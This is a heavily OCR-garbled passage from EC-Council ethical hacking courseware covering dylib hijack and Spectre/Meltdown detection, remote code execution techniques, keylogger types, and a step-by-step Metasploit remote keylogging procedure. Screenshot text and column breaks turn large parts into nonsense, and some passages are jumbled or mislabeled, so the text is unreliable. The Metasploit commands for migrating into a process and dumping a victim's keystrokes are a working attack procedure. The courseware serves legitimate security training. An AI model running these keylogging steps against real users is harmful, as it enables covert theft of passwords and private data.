Source: https://objective-see.com Dylib Hijack Scanner (DHS) is a simple utility that will scan your computer applications that are either susceptible to dylib hijacking or have been hijacked.
for
As shown in the screenshot, security professionals use DHS to detect applications that have been hijacked or are vulnerable to dylib hijacking. This information helps them to patch and fix these applications.
Hijacked
Applications
/Applications/1Password 7.app/Contents/Plugins/1PasswordSafariAppExtension.a
Vulnerable
stents /MacOS/1PasswordSafariAppExtension
Applications
/Applications/Xcode.app/Contents/Developer/usr/bin/Udb /AppLications/Xcode. app/Contents/SharedF ®
raneworks /DVTSourceControl. framework/Ve
/Library/Application Support/Adobe/Adobe Desktop Conmon/ADS/Adobe Desktop Service.
Figure 6.130: Screenshot of Dylib Hijack Scanner
Module 06 Page 766
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Defending
Exam 312-50 Certified Ethical Hacker
against Spectre and Meltdown Vulnerabilities
CE H
Regularly patch and update operating systems and firmware Enable continuous monitoring of critical applications and services running on the system and network Regularly patch vulnerable software such as browsers Install and update ad-blockers and anti-malware software to block injection of malware through compromised websites Enable traditional protection measures such as endpoint security tools to prevent unauthorized system access Block services and applications that allow unprivileged usersto execute code Never install unauthorized software or access untrusted websites from systems storing sensitive information Use Data Loss Prevention (DLP) solutions to prevent leakage of critical information from runtime memory Frequently check with the manufacturerfor BIOS updates and follow the instructions provided by the manufacturer to install the updates Defending against Spectre and Meltdown Vulnerabilities Various countermeasures to defend privilege Meltdown vulnerabilities are as follows:
escalation
attacks
that
exploit
Spectre
and
Regularly patch and update OSs and firmware Enable continuous monitoring of critical applications and services running on the system and network Regularly patch vulnerable software such as browsers Install and update ad-blockers and anti-malware software to block injection of malware through compromised websites Enable traditional protection unauthorized system access
measures
such
as endpoint
security
tools to prevent
Block services and applications that allow unprivileged users to execute code Never install unauthorized software or access untrusted websites from systems storing sensitive information Use data loss prevention (DLP) solutions to prevent leakage of critical information from runtime memory
Frequently check with the manufacturer for BIOS updates and follow the instructions provided by the manufacturer to install the updates
Module 06 Page 767
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Tools for Detecting Spectre and Meltdown Vulnerabilities InSpectre
Spectre & Meltdown Checker
@ InSpectre examines and discloses any Windows system's hardware and software vulnerabilityto
@ Spectre & Meltdown Checker is a shell script to tell if your system is vulnerable againstthe several "speculative
Meltdown and Spectre attacks
=, InSpectre: Check Spectre and Meltdown Protection
InSpectre | Release#8
-
CE H
execution" CVEs
x
Check Windows operating system ciiprocossornardvere sel, Freeware by Steve Gibson / @Sqgrc
Spectre & Meltdown Vulnerability Status ‘System is Meltdown protected: YES System is Spectre protected: YES Microcode Update Available: NO! Performance: SLOWER CPUID: 50657
See GRC's InSpectre webpage at: htipsi/grc.comyinspectre htm for a full explanation ofthe use and operation of this freeware utility. Disable Mekdown Protection
Disable Specte Protection
|
Est i "ites Jann re com
pright © by
Tipe] /eihub com Al Rights Reserved Reproduction i
Tools for Detecting Spectre and Meltdown Vulnerabilities Security professionals 00075 Detection and exist in the system security professionals exploitation.
Module 06 Page 768
can use tools such as InSpectre, Spectre & Meltdown Checker, INTEL-SAMitigation Tool, etc. to detect Spectre and Meltdown vulnerabilities that hardware. Detection of these vulnerabilities before exploitation helps to install the necessary OS and firmware patches to defend against such
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
=
InSpectre Source: https://www.grc.com InSpectre examines capability to prevent an early stage helps reloads the updated
and discloses any Windows system’s hardware and software Meltdown and Spectre attacks. Detecting these vulnerabilities at security professionals to update system hardware, its BIOS, which processor firmware, and its OS to use the new processor features.
(*. InSpectre: Check Spectre and Meltdown Protection
-
Check Windows operating system
InSpectre
and processor hardware safety.
Release #8
Freeware by Steve Gibson/ @Sggrc
x LI
|
Spectre & Meltdown Vulnerability Status System is Meltdown protected: YES
System is Spectre protected: YES Microcode Update Available: NO!
Performance: SLOWER
CPUID: 50657 (full details
below
See GRC's InSpectre webpage at https //are. com/inspectre. him for a full explanation of the use and operation of this freeware utility. Disable Meltdown Protection
Disable Spectre Protection
Exit
Figure 6.131: Screenshot of InSpectre showing Spectre and Meltdown vulnerabilities
=
Spectre & Meltdown Checker
Source: https://github.com Spectre & Meltdown Checker is a shell script to determine whether a system is vulnerable against various “speculative execution” CVEs. For Linux systems, the script will detect mitigations, including backported non-vanilla patches, regardless of the advertised kernel version number or the distribution (such as Debian, Ubuntu, CentOS, RHEL, Fedora, openSUSE, Arch, etc.). As shown in the screenshot, security professionals use Spectre & Meltdown Checker to determine whether the system is immune to speculative execution vulnerabilities. This tool helps them in verifying whether the system has the known correct mitigations in place.
Module 06 Page 769
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
iew Search Terminal_Help $sudo_./spectre-meltdown-checker.sh
Spectre and Meltdown mitigation detection tool vo.
checking for vulnerabilities on current system
* Hardware support (CPU microcode) for mitigation techniques * Indirect Branch Restricted Speculation (IBRS) * SPEC_CTRL MSR is available * CPU indicates IBRS capability:
(SPEC_CTRL feature bit)
* CPU indicates
(SPEC_CTRL
Indirect Branch Prediction Barrier (IBPB) IBPB capability:
feature bit)
Single Thread Indirect Branch Predictors (STIBP) * SPEC CTRL MSR is available * CPU indicates STIBP capabilit; Speculative Store Bypass Disable (SSBD) * CPU indicates SSBD capability
L1 data cache invalidation * CPU indicates
L1D flush
(Intel SSBD)
capability:
Microarchitectural Data Sampling * VERW instruction
is available:
6M)
(L1D flush
bit)
J
Indirect Branch Predictor Controls * Indirect Predictor Disable feature is available: * Bottomless RSB Disable feature is available * BHB-Focused
feature
IMM
Indirect Predictor Disable feature is available:
Enhanced IBRS (IBRS_ALL)
* CPU indicates ARCH CAPABILITIES
MSR availability:
[JN
Jl
Figure 6.132: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities ee
File Edit
Vie
* ARCH
arch Terminal CAPABILITIES
minal
He
MSR
advertises
IBRS
ALL
capability:
[gy
* CPU explicitly indicates not being affected by Meltdown/LITF (RDCL_NO): * CPU explicitly indicates not being affected by Variant 4 (SSB_NO * CPU/Hypervisor * Hypervisor
indicates
indicates
host
L1D flushing is not necessary on this system: CPU
might
be
affected
by
RSB
underflow
JIIGN Jy
(RSBA) :
* CPU explicitly indicates not being affected by Microarchitectural Data Sampling (MDS No): * CPU explicitly indicates not being affected by TSX Asynchronous Abort (TAA NO) * CPU explicitly indicates not being affected by iTLB Multihit (PSCHANGE MSC NO)
* CPU explicitly indicates having MSR for TSX control (TSX CTRL_MSR): * CPU supports Transactional Synchronization Extensions (TSX): J * CPU
supports
* CPU supports
Software
Special
Guard
Register
Extensions
Buffer
(SGX)
Data
Sampling
* CPU microcode is known to cause stability problems le Oxffffffff cpuid 0x50657) * CPU microcode
is the latest
known available
(SRBDS):
version:
CVE-2017-5753
Affected by CVE-2017-5715
(Spectre
Variant
1,
bounds
check
[GM
[I
(family @x6 model 0x55 stepping x7 ucod
1/88/13 according to builtin firmwares DB v222+i20226208) * CPU vulnerability to the speculative execution attack variants Affected
I
(latest version is 0x500320a
dated 202
bypass):
(Spectre Variant 2, branch target injection.
Affected by CVE-2017-5754 (Variant 3, Meltdown, rogue data cache load Affected by CVE-2018-3640 (Variant 3a, rogue system register read): Affected by CVE-2018-3639 (Variant 4, speculative store bypass) Affected Affected
CVE-2018-3615 CVE-2018-3620 CVE-2018-3646
(Foreshadow (SGX), L1 terminal fault) (Foreshadow-NG (0S), L1 terminal fault): (Foreshadow-NG (VMM), L1 terminal fault)
Affected by CVE-2018-12126 (Fallout, microarchitectural store buffer data sampling (MSBDS)): Affected
by CVE-2018-12130 (ZombieLoad, microarchitectural y CVE-2018-12127
(RIDL,
microarchitectural
load
fill buffer data sampling (MFBDS)): [ij port data
sampling
(MLPDS)):
[aaa
Figure 6.133: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities
Module 06 Page 770
‘al Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH LO#03: Use Different Techniques to Hide Malicious Programs and Maintain Remote Access to the System
Maintaining Access After gaining access and escalating privileges on the target system, now attackers try to maintain their access for further exploitation of the target system or make the compromised system a launchpad from which to attack other systems in the network. Attackers remotely execute malicious applications such as keyloggers, spyware, and other malicious programs to maintain their access to the target system and steal critical information such as usernames and passwords. Attackers hide their malicious programs or files using rootkits, steganography, NTFS data streams, etc. to maintain their access to the target system.
Module 06 Page 771
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Executing Applications
CE H
(@
When attackers execute malicious applications it is called “owning” the system
@
The attacker executes malicious programs remotely in the victim’s machine to gather the information that leads to exploitation or loss of privacy, gain unauthorized access to system resources, crack the password, capture the screenshots, install backdoor to maintain easy access, etc.
Malicious Programs that Attackers Execute on Target Systems
Keyloggers
Backdoors
Crackers
ry)
Executing Applications Once attackers gain higher privileges in the target system by trying attempts, they may attempt to execute a malicious application by execute arbitrary code. By executing malicious applications, the information, gain unauthorized access to system resources, screenshots, install a backdoor for maintaining easy access, etc.
various privilege escalation exploiting a vulnerability to attacker can steal personal crack passwords, capture
Attackers execute malicious applications at this stage in a process called “owning” the system. Once they acquire administrative privileges, they will execute applications. Attackers may even try to do so remotely on the victim’s machine to gather the same information as above. The malicious programs attackers execute on target systems can be: =
Backdoors: Program designed to deny or disrupt the operation, gather information that leads to exploitation or loss of privacy, or gain unauthorized access to system resources.
=
Crackers: Components passwords.
=
Keyloggers: These can be hardware or software. In either case, the objective is to record each keystroke made on the computer keyboard.
=
Spyware: Spy software may capture screenshots and send them to a specified location defined by the hacker. For this purpose, attackers have to maintain access to victims’ computers. After deriving all the requisite information from the victim’s computer, the attacker installs several backdoors to maintain easy access to it in the future.
Module 06 Page 772
of software
or
programs
designed
for
cracking
a
code
or
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Remote Code Execution Techniques Exploitation for
| H
@ Unsecure coding practicesin software can make it vulnerableto various attacks
Client Execution
(@ Attackers can take advantage of the vulnerabilities in software through focused and targeted exploitations with an objective of arbitrary code execution to maintain access to the target remote system
Service Execution
@ System services are programs that run and operate at the backend of an operating system @ Attackers run binary files or commands that can communicate with the Windows system services such as
‘Windows Management
|@ WMIisa feature in Windows administration that provides a platform for accessing Windows system resources | locally and remotely
Service Control Manager to maintain access to the remote system
Instrumentation
|@ Attackers can exploit WMI features to interact with the remote target system and use it to perform information
Windows Remote
|@ WinRM is a Windows-based protocol designed to allowa user to run an executable file, modify system services, and the registry on a remote system
(WinRM)
(@ Attackers can use the wiinrmcommandto interact with WinRM and execute a payload on the remote system as
(wM1
Management
gathering on system resources and further execute code for maintaining access to the target system
a part of the lateral movement
Remote Code Execution Techniques Remote code execution techniques are various tactics that can be used by attackers to execute malicious code on a remote system. These techniques are often performed after compromising a system initially and further expanding access to remote systems present on the target network.
Some examples of remote code execution techniques are as follows: =
Exploitation for Client Execution
Insecure coding practices in software can make it vulnerable to various attacks. Attackers can exploit these underlying vulnerabilities in software through focused and targeted exploitations with an objective of arbitrary code execution to maintain access
to the target remote system.
Different types of exploitations for client execution are as follows: o
Web-Browser-Based Exploitation
Attackers target web browsers through spear phishing links and drive-by compromise. The remote systems can be compromised through normal web browsing or through several users who are targeted victims of spear phishing links to attacker-controlled sites used to exploit the web browser. This type of exploitation does not need user intervention for execution. o
Office-Applications-Based Exploitation Attackers target common office applications such as Microsoft Office through different variants of spear phishing. Emails containing links to malicious files are
Module 06 Page 773
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
directly sent to the end-users for downloading. To run the exploit, end-users are required to open a malicious document or file. o.
Third-Party Applications-Based Exploitation Attackers can also exploit commonly used third-party applications deployed as part of the software. Applications such as Adobe Reader, Flash, etc. are usually targeted
by attackers to gain access to remote systems.
=
Service Execution System services are programs that run and operate at the backend of an run binary files or commands that can communicate with Windows system as Service Control Manager. This code execution technique is performed new service or by modifying an existing service at the time of privilege maintaining access.
=
OS. Attackers services such by creating a escalation or
Windows Management Instrumentation (WMI) WMI is a feature in Windows administration that manages data and operations on Windows and provides a platform for accessing Windows system resources locally and remotely. Attackers can use the WMI feature to interact with the target system remotely, gather information on system resources, and further execute code for maintaining access to the target system. Attackers abuse WMI to perform lateral movements from the compromised system. Attackers leverage this feature to elevate privileges and obtain access rights on other networked systems. WMI helps attackers gain both local and remote access through WMI remote services such as the Distributed Component Object Model (DCOM) via port 135 and Windows Remote Management (WinRM) via HTTP port 5985 and HTTPS port 5986. Using WMI, attackers can also communicate with remote systems and run malicious files to maintain persistence and move laterally.
=
Windows Remote Management (WinRM) WinRM is a Windows-based protocol designed to allow a user to run an executable file to modify system services and the registry on a remote system. Attackers can use the winrm command to interact with WinRM and execute a payload on the remote system as a part of lateral movement.
Module 06 Page 774
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Tools for Executing Applications
CE H
] ] |i Dameware | Dameware Remote Support is a remote
| ] |
Remote
Support
Ninja con Nini
control and systems management tool that
| simplifies remote Windows administration
onhin BS
=
GRR2
598
ff
;
|
:
e
PDQ Deploy tif pcm ManageEngine Desktop Central -ntps://unow monogeengine.com PsExec ‘etps://docs.mirosof.com
Tools for Executing Applications Tools used for executing applications remotely help attackers perform various malicious activities on the target systems. After gaining administrative privileges, attackers use these tools to install, execute, delete, and/or modify the restricted resources on the victim machine.
Module 06 Page 775
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures ‘System Hacking =
Exam 312-50 Certified Ethical Hacker
Dameware Remote Support
Source: https://www.dameware.com Dameware Remote Support is a remote control and systems management tool that simplifies remote Windows administration, provides built-in remote admin tools, and remotely manages Active Directory (AD) environment. Disconnected - DameWare Mini Remote Control
File Edt View
{SESE E £98 Bp SAM Computers # £3 PNRP Peers £3 MAC Peers Saved Howt Lit
]D]_
i Global Hoot List
Sy Pena Host Lit o Eig Remote Host Lit
Poy
* Use Intel AMT KVM Connects to a remote intel AMT KVM host using the Remote
Use Frame Buffer (RFB) protocol Use ths option to connect to remete Qs! systems running on Intel vPro hardware. Ose Vn
Help users outs of your network by comectng to them over the Internet from Mei Renote Conta. Features ony avaiable for users nth Daneiare Remote Support hence. hea more
&Q,
Credentials Secumtyber [Remem
a
iy Internet Session
2 i Active Dretay Cenpues 2 Merook Weds Netw
Type: [Intel AMT Digest auherticaion Use Curent Logon Credentis User: Pacsmoed|
AU
New features
[iawe
Host Name /IP Adéese
&
2)
Global Host List
Access a common set ofhostsin Danellare Remote Support or Mev Remote Cantal when You carnect to Danelare Server. sieommere
Personal Host List Greate you onn host ist that you can ‘access fom any Danevare Remote Support or Mii Remote Contra when Server. you connect to Daneiiare hewn mre D0 not show again
zener
© Use nlaKM Connect via Pray Host
For Help, pressFI Figure 6.134: Screenshot of Dameware Remote Support
Some of the privilege escalation tools are listed as follows:
=
Ninja (https://github.com)
=
Pupy (https://github.com)
=
PDQ Deploy (https://vww.pdq.com)
=
ManageEngine Desktop Central (https://www.manageengine.com)
=
PsExec (https://docs.microsoft.com)
Module 06 Page 776
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
C | EH
Keylogger
© Keystroke loggers are programs or hardware devices that monitor each keystroke as the user types on a keyboard, logs ontoa file, or transmits them to a remote
location
@ Keyloggers allows the attackerto gather confidential information about the victim such as email ID, passwords, banking details, chat room activity, IRC, and instant messages
© Physical keyloggers are placed between the keyboard hardware and the operating system
sendittoa
&
o-
Keyboard Injection
atefe
ini
Cos
~
a
AE Poiiiation 4p Aviation Be
peteeeeetees
«omnes
«
Kernel injection
Keyoadsys
Ung(character) (Gar yeckeyntae == ~32767)
Sends malicious file
t
» file, the keylogger gets installed
Driver
mousesys | why
~~! Othe diver
Windows Kernel HAL
User
Keylogger Keyloggers are software programs or hardware devices that record the keys struck on the computer keyboard (also called keystroke logging) of an individual computer user or a network of computers. You can view all the keystrokes of the victim’s computer at any time in your system by installing this hardware device or program. It records almost all the keystrokes on a keyboard of a user and saves the recorded information in a text file. As keyloggers hide their processes and interface, the target is unaware of the keylogging. Offices and industries use keyloggers to monitor employees’ computer activities, and they can also be used in home environments for parents to monitor children’s Internet activities. Keyboard Injection Saveit to ‘a log fil tog file
C1.
Keylogger Injection emoggerin
BE *vietion Bp rovication ge
Driver Injection
«
Kemel injection
a
Driver Keyboard.sys
Using i£ (Get Asynckeystate
(character) == -32767)
Other drivers
Windows Kernel HAL
Keyboard
User
_usb.sys.
t »
file, the keylogger gets installed
mouse.sys
Figure 6.135: Demonstration of a keylogger
A keylogger, when associated with spyware, helps to transmit a user’s information to an unknown third party. Attackers use it illegally for malicious purposes, such as stealing sensitive and
confidential
information
about
victims.
This
sensitive
information
includes
email
IDs,
passwords, banking details, chat room activity, Internet relay chat (IRC), instant messages, and bank and credit card numbers. The data transmitted over the encrypted Internet connection Module 06 Page 777
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking are also vulnerable encryption.
to
Exam 312-50 Certified Ethical Hacker keylogging
because
the
keylogger
tracks
the
keystrokes
before
The keylogger program is installed onto the user’s system invisibly through email attachments or “drive-by” downloads when users visit certain websites. Physical keystroke loggers “sit” between keyboard hardware and the OS, so that they can remain undetected and record every keystroke. A keylogger can: Record every keystroke typed on the user’s keyboard Capture screenshots at regular intervals, showing user activity such as typed characters or clicked mouse buttons Track the activities of users by logging Window titles, names of launched applications, and other information Monitor the online activity of users by recording addresses of the websites visited and with keywords entered Record all login names, bank and credit card numbers, and passwords, including hidden passwords or data displayed in asterisks or blank spaces Record online chat conversations. Make unauthorized copies of both outgoing and incoming email messages
Module 06 Page 778
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Types of Keystroke Loggers g
CE H Keystroke Loggers
I
l
Hardware
Software
Keystroke Loggers
Keystroke Loggers
H
|
| PC/BIOS Embedded
PS/2 and USB Keylogger
Application Keylogger
| Keylogger Keyboard
‘Acoustic/CAM Keylogger
Kernel Keylogger
External Keylogger
Bluetooth Keylogger
ypervisorbased Keylogger Form Grabbing Based Keylogger Javascript Based Keylogger
Wi-Fi Keylogger
Memory Injection Based Keylogger
Types of Keystroke Loggers A keylogger is a hardware or software program that secretly records each keystroke on the user eyboard at any time. Keyloggers save captured keystrokes to a file for reading later, or transmit them to a place where the attacker can access it. As these programs record all the eystrokes that are provided through a keyboard, they can capture passwords, credit card numbers, email addresses, names, postal addresses, and phone numbers. Keyloggers can capture information before it is encrypted. This gives the attacker access to passphrases and other “well-hidden” information.
Keystroke Loggers
Hardware
Software
Keystroke Loggers
Keystroke Loggers Application Keylogger
PC/BIOS Embedded
Keylogger Keyboard
Kernel Keylogger
External Keylogger
Wypendsor based Keylogger Form Grabbing
Ps/2 and USB
Keylogger
Acoustic/CAM
Keylogger
Bluetooth
Keylogger
Wi-Fi
keylogger
Based Keylogger Javascript Based Keylogger Memory Injection Based Keylogger
Figure 6.136: Types of keyloggers
Module 06 Page 779
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
There are two types of keystroke loggers: hardware key loggers and software key loggers. Both types help attackers to record all keystrokes entered on the target system. Hardware Keystroke Loggers
Hardware keyloggers are hardware devices that look like normal USB drives. Attackers can connect these keyloggers between a keyboard plug and a USB socket. All the keystrokes by the user are stored in the hardware unit. Attackers retrieve this hardware unit to access the keystrokes that are stored in it. Their disadvantage is the easy discovery of their physical presence. There are three main types of hardware keystroke loggers: o
PC/BIOS Embedded BlOS-level firmware that is responsible for managing keyboard actions can be modified in such a way that it captures the keystrokes that are typed. It requires physical and/or admin-level access to the target computer.
Keylogger Keyboard If the hardware circuit is attached to the keyboard cable connector, it can capture the keystrokes. It records all the keyboard strokes to its own internal memory that can be accessed later. The main advantage of a hardware keylogger over a software keylogger is that it is not OS dependent and, hence, will not interfere with any applications running on the target computer, and it is impossible to discover hardware keyloggers by using any anti-keylogger software. External Keylogger External keyloggers are attached between a standard PC keyboard and a computer. They record each keystroke. External keyloggers do not need any software and work with any PC. You can attach one to your target computer and monitor the recorded information on your PC to look through the keystrokes. There are four types of external keyloggers: e
PS/2 and USB Keylogger: and requires no software typed by the user on the chat records, applications
e
Acoustic/CAM Keylogger: Acoustic keyloggers work on the principle of converting electromagnetic sound waves into data. They employ either a capturing receiver capable of converting the electromagnetic sounds into the keystroke data, or a CAM (camera) capable of recording screenshots of the keyboard.
e
Bluetooth Keylogger: This requires physical access to the target computer only once, at the time of installation. After installation on the target PC, it stores all the keystrokes and you can retrieve the keystroke information in real-time by connecting via a Bluetooth device.
Module 06 Page 780
This is completely transparent to computer operation or drivers for functionality. It records all the keystrokes computer keyboard, and stores data such as emails, used, IMs, etc.
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
e
Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, this features remote access over the Internet. This wireless keylogger will connect to a local Wi-Fi access point and send emails containing the recorded keystroke data. You can also connect to the keylogger at any time over TCP/IP and view the captured log.
Software Keystroke Loggers These loggers are the software installed remotely via a network or email attachment in a target system for recording all the keystrokes. Here, the logged information is stored as a log file on a computer hard drive. The logger sends keystroke logs to the attacker using email protocols. Software loggers can often obtain additional data as well, because they do not have the limitation of physical memory allocation, as do hardware keystroke loggers. There are four types of software keystroke loggers: o
Application Keylogger An application keylogger allows you to emails, chats, and other applications, trace records of Internet activity. This everything happening within the entire
observe everything the user types in his/her including passwords. It is even possible to is an invisible keylogger to track and record network.
Kernel/Rootkit/Device Driver Keylogger Attackers rarely use kernel keyloggers because they are difficult to write and require a high level of proficiency from the keylogger developers. These keyloggers exist at the kernel level. Consequently, they are difficult to detect, especially for user-mode applications. This kind of keylogger acts as a keyboard device driver and thus gains access to all information typed on the keyboard. The rootkit-based keylogger is a forged Windows device driver that records all keystrokes. This keylogger hides from the system and is undetectable, even with standard or dedicated tools. This kind of keylogger usually acts as a device driver. The device driver keylogger replaces the existing 1/O driver with the embedded keylogging functionality. This keylogger saves all the keystrokes performed on the computer into a hidden logon file, and then sends the file to the destination through the Internet. Hypervisor-Based Keylogger A hypervisor-based keylogger works within a malware hypervisor operating on the
Os.
Form-Grabbing-Based Keylogger A form-grabbing-based keylogger records web form data and then submits it over the Internet, after bypassing HTTPS encryption. Form-grabbing-based keyloggers log web form inputs by recording web browsing on the “submit event” function.
Module 06 Page 781
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking o
Exam 312-50 Certified Ethical Hacker
JavaScript-Based Keylogger Attackers inject malicious JavaScript tags on the web page of a compromised website to listen to key events such as onKeyUp() and onKeyDown(). Attackers use various techniques such as man-in-the-browser/manipulator-in-the-browser, crosssite scripting, etc. to inject malicious script.
o
Memory-Injection-Based Keylogger Memory-injection-based keyloggers modify the memory tables associated with the web browser and system functions to log keystrokes. Attackers also use this technique to bypass UAC in Windows systems.
Module 06 Page 782
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Remote Keylogger Attack Using Metasploit |@ Attackers use tools such as Metasploit to launch persistent keylogging
@ Use the Keyscan_start command to initiate the actual keylogging process on the target system
|@ Attackers can also automate the entire sniffing and data dumping process using the Metasploit lockout_keylogger
exploit
Use the Keyscan_dump command to sniff the keystrokes of the user on the target machine
Copyright © by
Remote Keylogger Attack Using Metasploit Attackers may obtain remote access to the victim machine, but they cannot access specific folders or files that are secured with strong passwords. To steal such complex passwords from the target machine, attackers need to install and run a keylogger to capture the keyboard entries. For this purpose, attackers use tools such as Metasploit to launch persistent keylogging.
Establishing a Keylogger Using Metasploit On the exploited Windows machine, attackers establish following steps. =
a Meterpreter session and perform the
Use the ps command to obtain the list of running processes and their process IDs (PIDs) on the target system.
Module 06 Page 783
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
To avoid closing and reinitiating the ongoing exploitation process, their current PID to that of a running process (here, explorer.exe).
attackers
migrate
getpid migrate
msedge.exe
ewy\Shel LExperienceHost.ex e
Windows11\Admin
conhost.exe
4
jusched.exe
C:\Program
svchost.exe
(x86)\Mic
rosoft\Edge\Application\ms
edge.exe
Windows11\Admin
8
Files
C:\Windows\System32\conhos
t.exe
Windows11\Admin
C:\Program
Files
(x86)\Com
NT
C:\Windows\System32\svchos
mon Files\Java\Java Update \jusched.exe
AUTHORITY\SYSTEM
t.exe
msedge.exe
xi
Windows11\Admin
C:\Program
Files
(x86)\Mic
msedge.exe
x
Windows11\Admin
C:\Program
Files
(x86)\Mic
svchost.exe
msed
6
4
NT
rosoft\Edge\AppLication\m edge.exe
rosoft\Edge\Application\ms
AUTHORITY\LOCAL
SERVICE
Windows11\Admin NT
edge.exe
C:\Windows\System32\svchos
t.exe
C:\Program
Files
(x86)\Mic
rosoft\Edge\Application\ms
AUTHORITY\LOCAL
SERVICE
edge.exe
C:\Windows\System32\svchos
t.exe
Imcterpreter >[migrate 8664 Migrating from 6580 to 8664 Migration completed successfully. Figure 6.137: Screenshot of Metasploit showing the migration of PID = =
Use
the Keyscan_start
target system.
command
to initiate the actual
keylogging
process
on the
Now, use the Keyscan_dump command to sniff user keystrokes on the target machine. This command dumps all the sniffed keystrokes and displays them on the console. Use the keyscan_stop command to stop sniffing keystrokes.
m > keyscan start Starting the keystroke sniffer Dumping captured keystrokes
1
>> |
ols System
Type | Name.
Value
IAT IAT
[ff#20000b95834] \SystemRoot\system32\kdeom dll [text] f¥ IAT/EAT [te0000b96820) \SystemRoot\system32%kdcom.dl [tex] > Devices
IAT
—_C-\Windows\system32\ntoskinl. exe[KDCOM .dillKdD3T ransition)
IAT
—_C:\Windows\system32\ntoskinl. exe[KDCOM.dliikdSendPacket)
IAT
IAT
IAT IAT IAT
[fffff80000b9b840} \SystemRoot\system32\kdcom dil [text]
—_C-\Windows\system32\ntoskml exe[KDCOM dil dDOTransition) —_C:\Windows\system32\ntoskml exe[KDCOM dll dReceivePacket]
{tifff80000b9bS18} \SystemRoot\system32\kdcom.dil [.text]
C:\Windows \system32\ntoskmnL.exe[KDCOM.dilKdRiestore]
Iff80000b990c} \SystemRoot\system@2\kdcom.l [text] [ffiff0000b9b900] \SystemRoot\system32\kdcom.dll [text]
—_ C:\Windows\system32\ntoskinl exe[KDCOM dillKdSave]
—_C\Windows\system@2\ntoskinl exelKDCOM alk dDebuggerinisize0] —_C-\Windows\system32\ntoskinl. exe[KDCOM.dlllKdDebuggertnitialize1) C:AWindows\system32\hal.dllKDCOM. dlKdRestore]
IAT
C:\Windows\system32\kdcom.difntoskml exelatol)
IAT
—_C:\Windows\system32\kdcom.difntoskinl exelinbyDisplayS|
IAT
IAT
IAT
IAT IAT IAT
IAT
Devi. Devi...
C\Windowe\epstem2\kdcom ditoskirewelKeFindConf CAWindows\syst dfnt exe! MmMaplo
I
Sewices Bee
WARNING !!
ebuoged dD lK C:AWindows\system32\kdcom dilntoskml exe
GMER has found system modification caused by ROOTKIT activity.
C:\Windows \system32\kdcom dlfHAL dllKComPortinLse]
OK
WF Fis
\Driver\atapi \Device\ide\IdeDevicePOTOLO-0 \Driver\atapi > DriverStartlo \Device\Ide\idePort0
Tffeo00T E64 iifas001 564480 ‘Hiffa8001 564480 fifseo0T 64480
Vde\deP Device Devi. \Dinve\stpi > DiverS ort tat lo Devi. \Dine\atapt > DiverStatlo \Devce\de\deDeviceP1TOLO.2 \Driver\atapi > DriverStartlo \Device\ScsiPort0 Devi... Devi. \Ditve\stpi > Diverstatlo \Device\SesPot Trace Trace Trace
{ffffa800156d5c0 _ntoskinl.exe CLASSPNP.SYS disk.sys >UNKNOWN [Oxfftffa8001 56d6c0}c< {lffa8001 354730 1 nttlofCallDriver -> \Device\HarddiskO\DRO[Oxtffffa8001 354790) 3 CLASSPNP.SYS|fff#f88001 904431] > ntllofCallDriver > \Device\Ide\ideDevicePOTOLO-O(0.._fffffa80012ba680
Trace \Driver\atepi{Oxftia800158be70] > IRP_MJ_CREATE -> Oniif2800156d6c0
ffa8001 56d6c0
